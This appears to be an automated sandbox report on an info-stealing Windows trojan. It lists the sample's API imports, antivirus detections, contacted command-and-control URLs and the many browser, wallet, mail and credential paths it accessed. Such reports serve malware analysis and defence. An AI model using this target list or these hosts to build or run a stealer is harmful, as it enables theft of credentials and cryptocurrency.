DynamicLoader: kernel32.dll/CreateActCtxW
DynamicLoader: OLEAUT32.dll/
DynamicLoader: OLEAUT32.dll/
DynamicLoader: kernel32.dll/ActivateActCtx
DynamicLoader: kernel32.dll/FindActCtxSectionStringW
DynamicLoader: kernel32.dll/DeactivateActCtx
DynamicLoader: OLEAUT32.dll/DllGetClassObject
DynamicLoader: WS2_32.dll/getaddrinfo
DynamicLoader: WS2_32.dll/getnameinfo
DynamicLoader: WS2_32.dll/freeaddrinfo
DynamicLoader: OLEAUT32.dll/DllCanUnloadNow
DynamicLoader: WS2_32.dll/
DynamicLoader: WS2_32.dll/
DynamicLoader: WS2_32.dll/
DynamicLoader: WS2_32.dll/WSASocketA
DynamicLoader: WS2_32.dll/
DynamicLoader: ADVAPI32.dll/RegOpenKeyW
DynamicLoader: OLEAUT32.dll/
DynamicLoader: IPHLPAPI.DLL/ConvertInterfaceGuidToLuid
DynamicLoader: IPHLPAPI.DLL/GetIpForwardTable2
DynamicLoader: IPHLPAPI.DLL/GetIpNetEntry2
DynamicLoader: IPHLPAPI.DLL/FreeMibTable
DynamicLoader: api-ms-win-downlevel-ole32-l1-1-0.dll/StringFromIID
DynamicLoader: api-ms-win-downlevel-ole32-l1-1-0.dll/CoUninitialize
DynamicLoader: OLEAUT32.dll/
DynamicLoader: WS2_32.dll/
DynamicLoader: WS2_32.dll/
DynamicLoader: WS2_32.dll/
DynamicLoader: WS2_32.dll/WSASend
DynamicLoader: WS2_32.dll/WSARecv
DynamicLoader: api-ms-win-downlevel-ole32-l1-1-0.dll/CoSetProxyBlanket
DynamicLoader: ole32.dll/ObjectStublessClient10
DynamicLoader: OLEAUT32.dll/
DynamicLoader: ole32.dll/CoTaskMemFree
DynamicLoader: api-ms-win-downlevel-advapi32-l1-1-0.dll/RegEnumKeyExW
DynamicLoader: OLEAUT32.dll/
DynamicLoader: kernel32.dll/SetFileInformationByHandle
DynamicLoader: sqlite3.dll/sqlite3_open_v2
DynamicLoader: sqlite3.dll/sqlite3_prepare_v2
DynamicLoader: sqlite3.dll/sqlite3_step
DynamicLoader: sqlite3.dll/sqlite3_column_bytes
DynamicLoader: sqlite3.dll/sqlite3_column_blob
DynamicLoader: sqlite3.dll/sqlite3_column_text
DynamicLoader: sqlite3.dll/sqlite3_finalize
DynamicLoader: sqlite3.dll/sqlite3_close
DynamicLoader: KERNELBASE.dll/CompareStringEx
DynamicLoader: kernel32.dll/EnumSystemLocalesEx
DynamicLoader: kernel32.dll/GetDateFormatEx
DynamicLoader: kernel32.dll/GetLocaleInfoEx
DynamicLoader: kernel32.dll/GetTimeFormatEx
DynamicLoader: kernel32.dll/GetUserDefaultLocaleName
DynamicLoader: kernel32.dll/IsValidLocaleName
DynamicLoader: kernel32.dll/LCIDToLocaleName
DynamicLoader: kernel32.dll/LocaleNameToLCID
DynamicLoader: sqlite3.dll/sqlite3_open_v2
DynamicLoader: sqlite3.dll/sqlite3_prepare_v2
DynamicLoader: sqlite3.dll/sqlite3_step
DynamicLoader: sqlite3.dll/sqlite3_column_bytes
DynamicLoader: sqlite3.dll/sqlite3_column_text
DynamicLoader: sqlite3.dll/sqlite3_finalize
DynamicLoader: sqlite3.dll/sqlite3_close
DynamicLoader: sqlite3.dll/sqlite3_open_v2
DynamicLoader: sqlite3.dll/sqlite3_prepare_v2
DynamicLoader: sqlite3.dll/sqlite3_step
DynamicLoader: sqlite3.dll/sqlite3_column_bytes
DynamicLoader: sqlite3.dll/sqlite3_column_text
DynamicLoader: sqlite3.dll/sqlite3_finalize
DynamicLoader: sqlite3.dll/sqlite3_close
DynamicLoader: sqlite3.dll/sqlite3_open_v2
DynamicLoader: sqlite3.dll/sqlite3_prepare_v2
DynamicLoader: sqlite3.dll/sqlite3_step
DynamicLoader: sqlite3.dll/sqlite3_column_bytes
DynamicLoader: sqlite3.dll/sqlite3_column_blob
DynamicLoader: sqlite3.dll/sqlite3_column_text
DynamicLoader: sqlite3.dll/sqlite3_finalize
DynamicLoader: sqlite3.dll/sqlite3_close
DynamicLoader: api-ms-win-downlevel-ole32-l1-1-0.dll/CoTaskMemAlloc
DynamicLoader: WININET.dll/FindFirstUrlCacheEntryA
DynamicLoader: api-ms-win-downlevel-ole32-l1-1-0.dll/CoTaskMemFree
DynamicLoader: vaultcli.dll/VaultOpenVault
DynamicLoader: vaultcli.dll/VaultCloseVault
DynamicLoader: vaultcli.dll/VaultEnumerateItems
DynamicLoader: vaultcli.dll/VaultGetItem
DynamicLoader: vaultcli.dll/VaultFree
DynamicLoader: WS2_32.dll/
DynamicLoader: WS2_32.dll/
DynamicLoader: ncrypt.dll/SslDecrementProviderReferenceCount
DynamicLoader: ncrypt.dll/SslFreeObject
DynamicLoader: WS2_32.dll/
DynamicLoader: Pstorec.dll/PStoreCreateInstance
DynamicLoader: WS2_32.dll/
DynamicLoader: urlmon.dll/URLDownloadToFileA
CAPE extracted potentially suspicious content
MUo8TIzTu0DDL.exe: Unpacked Shellcode
MUo8TIzTu0DDL.exe: Unpacked Shellcode
MUo8TIzTu0DDL.exe: Unpacked Shellcode
HTTP traffic contains suspicious features which may be indicative of malware related traffic
post_no_referer: HTTP traffic contains a POST request with no referer header
post_no_useragent: HTTP traffic contains a POST request with no user-agent header
ip_hostname: HTTP connection was made to an IP address rather than domain name
suspicious_request: http://35.223.217.188/gate/log.php
suspicious_request: http://35.223.217.188/gate/sqlite3.dll
suspicious_request: http://35.223.217.188/gate/libs.zip
Performs some HTTP requests
url: http://35.223.217.188/gate/log.php
url: http://35.223.217.188/gate/sqlite3.dll
url: http://35.223.217.188/gate/libs.zip
Unconventionial language used in binary resources: Arabic (Tunisia)
The binary likely contains encrypted or compressed data.
section: name: .text, entropy: 7.91, characteristics: IMAGE_SCN_CNT_CODE|IMAGE_SCN_MEM_EXECUTE|IMAGE_SCN_MEM_READ, raw_size: 0x00063800, virtual_size: 0x00063685
Authenticode signature is invalid
authenticode error: No signature found. SignTool Error File not valid C\Users\Louise\AppData\Local\Temp\MUo8TIzTu0DDL
Attempts to repeatedly call a single API many times in order to delay analysis time
Spam: services.exe (476) called API GetSystemTimeAsFileTime 512839 times
Steals private information from local Internet browsers
file: C:\Users\Louise\AppData\Local\Google\Chrome\User Data\Default\Login Data
file: C:\Users\Louise\AppData\Local\Google\Chrome\User Data\Default\Cookies
file: C:\Users\Louise\AppData\Local\Google\Chrome\User Data\Default\Web Data
Collects information about installed applications
Program: ActiveState ActivePython 2.7.10.12
Program: Microsoft Office Access Setup Metadata MUI 2010
Program: Microsoft Office Groove MUI 2010
Program: Update for Microsoft InfoPath 2010 32-Bit Edition
Program: Google Update Helper
Program: Microsoft Office Word MUI 2010
Program: Python 2.7 Pillow-5.4.1
Program: Java Auto Updater
Program: Update for Microsoft Filter Pack 2.0 32-Bit Edition
Program: Python 3.8.2 Core Interpreter
Program: Microsoft Office Proofing 2010
Program: Python 3.8.2 Add to Path
Program: Mozilla Thunderbird 60.5.0
Program: Update for Microsoft .NET Framework 4.7.2
Program: Update for Microsoft Visio 2010 32-Bit Edition
Program: Microsoft Office InfoPath MUI 2010
Program: Java 7 Update 17
Program: Update for Microsoft SharePoint Workspace 2010 32-Bit Edition
Program: Microsoft Office Shared MUI 2010
Program: Python 3.8.2 Executables
Program: Update for Microsoft Office 2010 32-Bit Edition
Program: Update for Microsoft Access 2010 32-Bit Edition
Program: Update for Microsoft Word 2010 32-Bit Edition
Program: Definition Update for Microsoft Office 2010 32-Bit Edition
Program: Python 3.8.2 Documentation
Program: Skype version 8.38
Program: Microsoft Office Excel MUI 2010
Program: Slack
Program: Microsoft Office Publisher MUI 2010
Program: Python 3.8.2 Utility Scripts
Program: Microsoft Office PowerPoint MUI 2010
Program: Microsoft Office OneNote MUI 2010
Program: Microsoft Office Professional Plus 2010
Program: Update for Microsoft OneNote 2010 32-Bit Edition
Program: Microsoft Office Access MUI 2010
Program: Adobe Flash Player 17 NPAPI
Program: Python 3.8.2 Tcl/Tk Support
Program: Microsoft Visual C++ 2005 Redistributable
Program: Update for Microsoft Excel 2010 32-Bit Edition
Program: Service Pack 2 for Microsoft Office 2010 32-Bit Edition
Program: Python 3.8.2 Standard Library
Program: Adobe Reader XI
Program: Python 3.8.2 Development Libraries
Program: Office 16 Click-to-Run Extensibility Component
Program: Mozilla Firefox 75.0
Program: Update for Microsoft Outlook 2010 32-Bit Edition
Program: Microsoft .NET Framework 1.1
Program: Python Launcher
Program: Office 16 Click-to-Run Localization Component
Program: Google Chrome
Program: Update for Microsoft Visio Viewer 2010 32-Bit Edition
Program: FileZilla Client 3.40.0
Program: Python 3.8.2
Program: Microsoft Office Outlook MUI 2010
Program: Microsoft Office Proof 2010
Program: Security Update for Microsoft Office 2010 32-Bit Edition
Program: Microsoft OneDrive
Program: Update for Microsoft PowerPoint 2010 32-Bit Edition
Program: Microsoft Silverlight
Program: Microsoft Office Shared Setup Metadata MUI 2010
Program: Python 3.8.2 pip Bootstrap
Program: Python 3.8.2 Test Suite
File has been identified by 16 Antiviruses on VirusTotal as malicious
Bkav: HW32.Packed.
K7GW: Hacktool ( 700007861 )
Cybereason: malicious.54cfb1
Invincea: heuristic
Symantec: ML.Attribute.HighConfidence
APEX: Malicious
Rising: Malware.Heuristic!ET#92% (RDMK:cmRtazqmAGYxQLzixYegGNiXrGvE)
FireEye: Generic.mg.bead5dfd7b20f087
Ikarus: Trojan-Banker.UrSnif
Endgame: malicious (high confidence)
Microsoft: Trojan:Win32/Wacatac.DD!ml
Cynet: Malicious (score: 100)
Acronis: suspicious
SentinelOne: DFI - Malicious PE
BitDefenderTheta: Gen:[email protected]
CrowdStrike: win/malicious_confidence_80% (D)
Attempts to modify proxy settings
Attempts to access Bitcoin/ALTCoin wallets
file: C:\Users\Louise\AppData\Roaming\Electrum\wallets
Harvests information related to installed mail clients
key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook
key: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Microsoft Outlook Internet Settings
key: HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook
key: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Outlook\Profiles\Outlook
key: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook
key: HKEY_CURRENT_USER\Software\Microsoft\Office\19.0\Outlook\Profiles\Outlook
key: HKEY_CURRENT_USER\Software\Microsoft\Office\17.0\Outlook\Profiles\Outlook
key: HKEY_CURRENT_USER\Software\Microsoft\Office\13.0\Outlook\Profiles\Outlook
key: HKEY_CURRENT_USER\Software\Microsoft\Office\18.0\Outlook\Profiles\Outlook
key: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts
key: HKEY_CURRENT_USER\Software\Microsoft\Internet Account Manager\Accounts
key: HKEY_CURRENT_USER\Identities\{5F37F099-726C-41B1-A10F-ADFDB822499D}\Software\Microsoft\Internet Account Manager\Accounts
Attempts to create or modify system certificates
Collects information to fingerprint the system
Created network traffic indicative of malicious activity
signature: ET JA3 Hash - Possible Malware - RigEK
signature: ET CURRENT_EVENTS Likely Evil EXE download from MSXMLHTTP non-exe extension M2
signature: ET CURRENT_EVENTS Likely Evil EXE download from dotted Quad by MSXMLHTTP M1
signature: ET CURRENT_EVENTS Likely Evil EXE download from dotted Quad by MSXMLHTTP M2
signature: ET JA3 Hash - Possible Malware - Various Eitest

Screenshots


Hosts

Direct IP Country Name
Y 8.8.8.8 [VT] United States
Y 51.145.123.29 [VT] United Kingdom
Y 35.223.217.188 [VT] United States
Y 2.21.7.89 [VT] Europe
N 195.201.225.248 [VT] Germany
Y 104.81.141.127 [VT] Netherlands

DNS

Name Response Post-Analysis Lookup
telete.in [VT] A 195.201.225.248 [VT] 195.201.225.248 [VT]

Summary

C:\Users\Louise\AppData\Local\Temp\MUo8TIzTu0DDL.exe.Local\
C:\Windows\winsxs\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.24308_none_5c028e37a0121035
C:\Windows\winsxs\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.24308_none_5c028e37a0121035\GdiPlus.dll
C:\Windows\System32\api-ms-win-core-fibers-l1-1-1.DLL
C:\Windows\System32\api-ms-win-core-localization-l1-2-1.DLL
C:\Windows\System32\p2pcollab.dll
C:\Windows\System32\qagentrt.dll
C:\Windows\System32\dnsapi.dll
C:\Users\Louise\AppData\Roaming\Microsoft\SystemCertificates\My\Certificates\*
C:\Users\Louise\AppData\Roaming\Microsoft\SystemCertificates\My\CRLs\*
C:\Users\Louise\AppData\Roaming\Microsoft\SystemCertificates\My\CTLs\*
C:\Users\Louise\AppData\LocalLow\
C:\Users\Louise\AppData\Roaming\*
C:\Users\Louise\AppData\Roaming\Ethereum Wallet
C:\Users\Louise\AppData\Roaming\Ethereum
C:\Users\Louise\AppData\Roaming\Electrum
C:\Users\Louise\AppData\Roaming\Electrum\wallets
C:\Users\Louise\AppData\Roaming\Adobe\*
C:\Users\Louise\AppData\Roaming\Exodus\exodus.wallet
C:\Users\Louise\AppData\Roaming\Jaxx\Local Storage
C:\Users\Louise\AppData\Roaming\Adobe\Acrobat\*
C:\Users\Louise\AppData\Roaming\Adobe\Acrobat\11.0\*
C:\Users\Louise\Documents\Monero\wallets
C:\Users\Louise\AppData\Roaming\Adobe\Acrobat\11.0\Collab\*
C:\Users\Louise\AppData\Roaming\Adobe\Acrobat\11.0\Forms\*
C:\Users\Louise\AppData\Roaming\Adobe\Acrobat\11.0\JSCache\*
C:\Users\Louise\AppData\Roaming\Adobe\Acrobat\11.0\Security\*
C:\Users\Louise\AppData\Roaming\Adobe\AcroExt\*
C:\Users\Louise\AppData\Roaming\Adobe\AcroExt\Reader\*
C:\Users\Louise\AppData\Roaming\Adobe\AcroExt\Reader\11.0\*
C:\Users\Louise\AppData\Roaming\Adobe\AcroExt\Reader\11.0\cache\*
C:\Users\Louise\AppData\Roaming\Adobe\Flash Player\*
C:\Users\Louise\AppData\Roaming\Adobe\Flash Player\AssetCache\*
C:\Users\Louise\AppData\Roaming\Adobe\Flash Player\AssetCache\PY9FNTVD\*
C:\Users\Louise\AppData\Roaming\Adobe\Flash Player\NativeCache\*
C:\Users\Louise\AppData\Roaming\Adobe\Headlights\*
C:\Users\Louise\AppData\Roaming\Adobe\Linguistics\*
C:\Users\Louise\AppData\Roaming\Adobe\LogTransport2\*
C:\Users\Louise\AppData\Roaming\Identities\*
C:\Users\Louise\AppData\Roaming\Identities\{5F37F099-726C-41B1-A10F-ADFDB822499D}\*
C:\Users\Louise\AppData\Roaming\com.liberty.jaxx
C:\Users\Louise\AppData\Roaming\atomic
C:\Users\Louise\AppData\Roaming\IrfanView\*
C:\Users\Louise\AppData\Roaming\Media Center Programs\*
C:\Users\Louise\AppData\Roaming\Microsoft\*
C:\Users\Louise\AppData\Roaming\Microsoft\AddIns\*
C:\Users\Louise\AppData\Roaming\Microsoft\CLView\*
C:\Users\Louise\AppData\Roaming\Microsoft\CLView\1033\*
C:\Users\Louise\AppData\Roaming\Microsoft\Credentials\*
C:\Users\Louise\AppData\Roaming\Microsoft\Crypto\*
C:\Users\Louise\AppData\Roaming\Microsoft\Crypto\RSA\*
C:\Users\Louise\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-1339698970-4093829097-1161395185-1000\*
C:\Users\Louise\AppData\Roaming\Microsoft\Document Building Blocks\*
C:\Users\Louise\AppData\Roaming\Microsoft\Document Building Blocks\1033\*
C:\Users\Louise\AppData\Roaming\Microsoft\Document Building Blocks\1033\14\*
C:\Users\Louise\AppData\Roaming\Microsoft\Excel\*
C:\Users\Louise\AppData\Roaming\Microsoft\Installer\*
C:\Users\Louise\AppData\Roaming\Microsoft\Installer\{B1528EAE-7E64-49DB-8CE1-514EB30BB38B}\*
C:\Users\Louise\AppData\Roaming\Microsoft\Internet Explorer\*
C:\Users\Louise\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\*
C:\Users\Louise\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\*
C:\Users\Louise\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\ImplicitAppShortcuts\*
C:\Users\Louise\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\*
C:\Users\Louise\AppData\Roaming\Microsoft\Internet Explorer\UserData\*
C:\Users\Louise\AppData\Roaming\Microsoft\Internet Explorer\UserData\Low\*
C:\Users\Louise\AppData\Roaming\Microsoft\Network\*
C:\Users\Louise\AppData\Roaming\Microsoft\Network\Connections\*
C:\Users\Louise\AppData\Roaming\Microsoft\Network\Connections\Pbk\*
C:\Users\Louise\AppData\Roaming\Microsoft\Network\Connections\Pbk\_hiddenPbk\*
C:\Users\Louise\AppData\Roaming\Microsoft\Office\*
C:\Users\Louise\AppData\Roaming\Microsoft\Office\Recent\*
C:\Users\Louise\AppData\Roaming\Microsoft\PowerPoint\*
C:\Users\Louise\AppData\Roaming\Microsoft\Proof\*
C:\Users\Louise\AppData\Roaming\Microsoft\Protect\*
C:\Users\Louise\AppData\Roaming\Microsoft\Protect\S-1-5-21-1339698970-4093829097-1161395185-1000\*
C:\Users\Louise\AppData\Roaming\Microsoft\Skype for Desktop\*
C:\Users\Louise\AppData\Roaming\Microsoft\Skype for Desktop\blob_storage\*
\Device\RasAcd
C:\Users\Louise\AppData\Roaming\Microsoft\Skype for Desktop\blob_storage\5a03fdeb-8589-4535-8ff9-89d5a278e5c4\*
\Device\NetBT_Tcpip_{904D2269-4DBE-41E3-885E-48DAF5904320}
\Device\NetBT_Tcpip_{3D9F7467-160C-4168-A2F0-23218AC74924}
\Device\NetBT_Tcpip6_{904D2269-4DBE-41E3-885E-48DAF5904320}
\Device\NetBT_Tcpip6_{3D9F7467-160C-4168-A2F0-23218AC74924}
C:\Users\Louise\AppData\Roaming\Microsoft\Skype for Desktop\Cache\*
C:\Users\Louise\AppData\Roaming\Microsoft\Skype for Desktop\CS_skylib\*
C:\Users\Louise\AppData\Roaming\Microsoft\Skype for Desktop\dictionaries\*
C:\Windows\SysWOW64\wininet.dll
C:\Users\Louise\AppData\Roaming\Microsoft\Skype for Desktop\Local Storage\*
C:\Windows\System32\WSHTCPIP.DLL
C:\Windows\System32\wship6.dll
C:\Windows\System32\wshqos.dll
C:\Users\Louise\AppData\Roaming\Microsoft\Skype for Desktop\Local Storage\leveldb\*
C:\Users\Louise\AppData\Roaming\Microsoft\Skype for Desktop\logs\*
C:\Users\Louise\AppData\Roaming\Microsoft\Skype for Desktop\skylib\*
C:\Users\Louise\AppData\Roaming\Microsoft\Skype for Desktop\SkypeRT\*
C:\Users\Louise\AppData\Roaming\Microsoft\Skype for Desktop\webrtc_event_logs\*
C:\Users\Louise\AppData\Roaming\Microsoft\Speech\*
C:\Users\Louise\AppData\Roaming\Microsoft\Spelling\*
C:\Users\Louise\AppData\Roaming\Microsoft\SystemCertificates\*
C:\Users\Louise\AppData\Roaming\Microsoft\SystemCertificates\My\*
C:\Users\Louise\AppData\Roaming\Microsoft\Templates\*
C:\Users\Louise\AppData\Roaming\Microsoft\Templates\LiveContent\*
C:\Users\Louise\AppData\Roaming\Microsoft\Templates\LiveContent\16\*
C:\Users\Louise\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\*
C:\Users\Louise\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\*
C:\Users\Louise\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\*
C:\Users\Louise\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\SmartArt Graphics\*
C:\Users\Louise\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\SmartArt Graphics\1033\*
C:\Users\Louise\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Bibliography Styles\*
C:\Users\Louise\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Building Blocks\*
C:\Users\Louise\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Building Blocks\1033\*
C:\Users\Louise\AppData\Roaming\Microsoft\Templates\LiveContent\16\User\*
C:\Users\Louise\AppData\Roaming\Microsoft\Templates\LiveContent\16\User\Document Themes\*
C:\Users\Louise\AppData\Roaming\Microsoft\Templates\LiveContent\16\User\Document Themes\1033\*
C:\Users\Louise\AppData\Roaming\Microsoft\UProof\*
C:\Users\Louise\AppData\Roaming\Microsoft\Windows\*
C:\Users\Louise\AppData\Roaming\Microsoft\Windows\Cookies\*
C:\Users\Louise\AppData\Roaming\Microsoft\Windows\Cookies\Low\*
C:\Users\Louise\AppData\Roaming\Microsoft\Windows\DNTException\*
C:\Users\Louise\AppData\Roaming\Microsoft\Windows\DNTException\Low\*
C:\Users\Louise\AppData\Roaming\Microsoft\Windows\IECompatCache\*
C:\Users\Louise\AppData\Roaming\Microsoft\Windows\IECompatCache\Low\*
C:\Users\Louise\AppData\Roaming\Microsoft\Windows\IECompatUACache\*
C:\Users\Louise\AppData\Roaming\Microsoft\Windows\IECompatUACache\Low\*
C:\Users\Louise\AppData\Roaming\Microsoft\Windows\IEDownloadHistory\*
C:\Users\Louise\AppData\Roaming\Microsoft\Windows\IETldCache\*
C:\Users\Louise\AppData\Roaming\Microsoft\Windows\IETldCache\Low\*
C:\Users\Louise\AppData\Roaming\Microsoft\Windows\Libraries\*
C:\Users\Louise\AppData\Roaming\Microsoft\Windows\Network Shortcuts\*
C:\Users\Louise\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\*
C:\Users\Louise\AppData\Roaming\Microsoft\Windows\PrivacIE\*
C:\Users\Louise\AppData\Roaming\Microsoft\Windows\PrivacIE\Low\*
C:\Users\Louise\AppData\Roaming\Microsoft\Windows\Recent\*
C:\Users\Louise\AppData\Roaming\Microsoft\Windows\Recent\AutomaticDestinations\*
C:\Users\Louise\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\*
C:\Users\Louise\AppData\Roaming\Microsoft\Windows\SendTo\*
C:\Users\Louise\AppData\Roaming\Microsoft\Windows\Start Menu\*
C:\Users\Louise\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\*
C:\Users\Louise\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\*
C:\Users\Louise\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Accessibility\*
C:\Users\Louise\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools\*
C:\Users\Louise\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Administrative Tools\*
C:\Users\Louise\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Maintenance\*
C:\Users\Louise\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Python 3.8\*
C:\Users\Louise\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\*
C:\Users\Louise\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\WinRAR\*
C:\Users\Louise\AppData\Roaming\Microsoft\Windows\Templates\*
C:\Users\Louise\AppData\Roaming\Microsoft\Windows\Themes\*
C:\Users\Louise\AppData\Roaming\Microsoft\Word\*
C:\Users\Louise\AppData\Roaming\Mozilla\*
C:\Users\Louise\AppData\Roaming\Mozilla\Extensions\*
C:\Users\Louise\AppData\Roaming\Mozilla\Firefox\*
C:\Users\Louise\AppData\Roaming\Mozilla\Firefox\Crash Reports\*
C:\Users\Louise\AppData\Roaming\Mozilla\Firefox\Crash Reports\events\*
C:\Users\Louise\AppData\Roaming\Mozilla\Firefox\Pending Pings\*
C:\Users\Louise\AppData\Roaming\Mozilla\Firefox\Profiles\*
C:\Users\Louise\AppData\Roaming\Mozilla\Firefox\Profiles\0f9yudun.default\*
C:\Users\Louise\AppData\Roaming\Mozilla\Firefox\Profiles\0f9yudun.default\bookmarkbackups\*
C:\Users\Louise\AppData\Roaming\Mozilla\Firefox\Profiles\0f9yudun.default\crashes\*
C:\Users\Louise\AppData\Roaming\Mozilla\Firefox\Profiles\0f9yudun.default\crashes\events\*
C:\Users\Louise\AppData\Roaming\Mozilla\Firefox\Profiles\0f9yudun.default\datareporting\*
C:\Users\Louise\AppData\Roaming\Mozilla\Firefox\Profiles\0f9yudun.default\datareporting\archived\*
C:\Users\Louise\AppData\Roaming\Mozilla\Firefox\Profiles\0f9yudun.default\datareporting\archived\2020-04\*
C:\Users\Louise\AppData\Roaming\Mozilla\Firefox\Profiles\0f9yudun.default\datareporting\archived\2020-05\*
C:\Users\Louise\AppData\Roaming\Mozilla\Firefox\Profiles\0f9yudun.default\extensions\*
C:\Users\Louise\AppData\Roaming\Mozilla\Firefox\Profiles\0f9yudun.default\healthreport\*
C:\Users\Louise\AppData\Roaming\Mozilla\Firefox\Profiles\0f9yudun.default\minidumps\*
C:\Users\Louise\AppData\Roaming\Mozilla\Firefox\Profiles\0f9yudun.default\saved-telemetry-pings\*
C:\Users\Louise\AppData\Roaming\Mozilla\Firefox\Profiles\0f9yudun.default\sessionstore-backups\*
C:\Users\Louise\AppData\Roaming\Mozilla\Firefox\Profiles\0f9yudun.default\storage\*
C:\Users\Louise\AppData\Roaming\Mozilla\Firefox\Profiles\0f9yudun.default\storage\default\*
C:\Users\Louise\AppData\Roaming\Mozilla\Firefox\Profiles\0f9yudun.default\storage\default\moz-extension+++a71d39f3-7325-47a7-8e4e-0af8c98a10ce^userContextId=4294967295\*
C:\Users\Louise\AppData\Roaming\Mozilla\Firefox\Profiles\0f9yudun.default\storage\default\moz-extension+++a71d39f3-7325-47a7-8e4e-0af8c98a10ce^userContextId=4294967295\idb\*
C:\Users\Louise\AppData\Roaming\Mozilla\Firefox\Profiles\0f9yudun.default\storage\default\moz-extension+++a71d39f3-7325-47a7-8e4e-0af8c98a10ce^userContextId=4294967295\idb\3647222921wleabcEoxlt-eengsairo.files\*
C:\Users\Louise\AppData\Roaming\Mozilla\Firefox\Profiles\0f9yudun.default\storage\permanent\*
C:\Users\Louise\AppData\Roaming\Mozilla\Firefox\Profiles\0f9yudun.default\storage\permanent\chrome\*
C:\Users\Louise\AppData\Roaming\Mozilla\Firefox\Profiles\0f9yudun.default\storage\permanent\chrome\idb\*
C:\Users\Louise\AppData\Roaming\Mozilla\Firefox\Profiles\0f9yudun.default\storage\permanent\chrome\idb\1451318868ntouromlalnodry--epcr.files\*
C:\Users\Louise\AppData\Roaming\Mozilla\Firefox\Profiles\0f9yudun.default\storage\permanent\chrome\idb\1657114595AmcateirvtiSty.files\*
C:\Users\Louise\AppData\Roaming\Mozilla\Firefox\Profiles\0f9yudun.default\storage\permanent\chrome\idb\2823318777ntouromlalnodry--naod.files\*
C:\Users\Louise\AppData\Roaming\Mozilla\Firefox\Profiles\0f9yudun.default\storage\permanent\chrome\idb\2918063365piupsah.files\*
C:\Users\Louise\AppData\Roaming\Mozilla\Firefox\Profiles\0f9yudun.default\storage\permanent\chrome\idb\3561288849sdhlie.files\*
C:\Users\Louise\AppData\Roaming\Mozilla\Firefox\Profiles\0f9yudun.default\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.files\*
C:\Users\Louise\AppData\Roaming\Mozilla\Firefox\Profiles\0f9yudun.default\storage\permanent\chrome\idb\846562544phus.files\*
C:\Users\Louise\AppData\Roaming\Mozilla\Firefox\Profiles\0f9yudun.default\storage\temporary\*
C:\Users\Louise\AppData\Roaming\Mozilla\Firefox\Profiles\0f9yudun.default\weave\*
C:\Users\Louise\AppData\Roaming\Mozilla\Firefox\Profiles\0f9yudun.default\weave\failed\*
C:\Users\Louise\AppData\Roaming\Mozilla\Firefox\Profiles\0f9yudun.default\weave\toFetch\*
C:\Users\Louise\AppData\Roaming\Mozilla\Firefox\Profiles\0f9yudun.default\webapps\*
C:\Users\Louise\AppData\Roaming\Mozilla\SystemExtensionsDev\*
C:\Users\Louise\AppData\Roaming\Notepad++\*
C:\Users\Louise\AppData\Roaming\Notepad++\plugins\*
C:\Users\Louise\AppData\Roaming\Notepad++\plugins\config\*
C:\Users\Louise\AppData\Roaming\Notepad++\plugins\config\Hunspell\*
C:\Users\Louise\AppData\Roaming\Notepad++\themes\*
C:\Users\Louise\AppData\Roaming\NuGet\*
C:\Users\Louise\AppData\Roaming\Skype\*
C:\Users\Louise\AppData\Roaming\Skype\logs\*
C:\Users\Louise\AppData\Roaming\WinRAR\*
C:\Users\Louise\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\27XJCA2W
C:\Users\Louise\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\27XJCA2W\sqlite3[1].dll
C:\Users\Louise\AppData\LocalLow\sqlite3.dll
C:\Users\Louise\AppData\LocalLow\JN3by345by53432y
C:\Users\Louise\AppData\Local\Google\Chrome\User Data\*
C:\Users\Louise\AppData\Local\Google\Chrome\User Data\BrowserMetrics\*
C:\Users\Louise\AppData\Local\Google\Chrome\User Data\CertificateRevocation\*
C:\Users\Louise\AppData\Local\Google\Chrome\User Data\Crashpad\*
C:\Users\Louise\AppData\Local\Google\Chrome\User Data\Crashpad\reports\*
C:\Users\Louise\AppData\Local\Google\Chrome\User Data\Crowd Deny\*
C:\Users\Louise\AppData\Local\Google\Chrome\User Data\Default\*
C:\Users\Louise\AppData\Local\Google\Chrome\User Data\Default\AutofillStrikeDatabase\*
C:\Users\Louise\AppData\Local\Google\Chrome\User Data\Default\blob_storage\*
C:\Users\Louise\AppData\Local\Google\Chrome\User Data\Default\blob_storage\6a244f92-bb86-401f-9f20-1aa6374054d1\*
C:\Users\Louise\AppData\Local\Google\Chrome\User Data\Default\BudgetDatabase\*
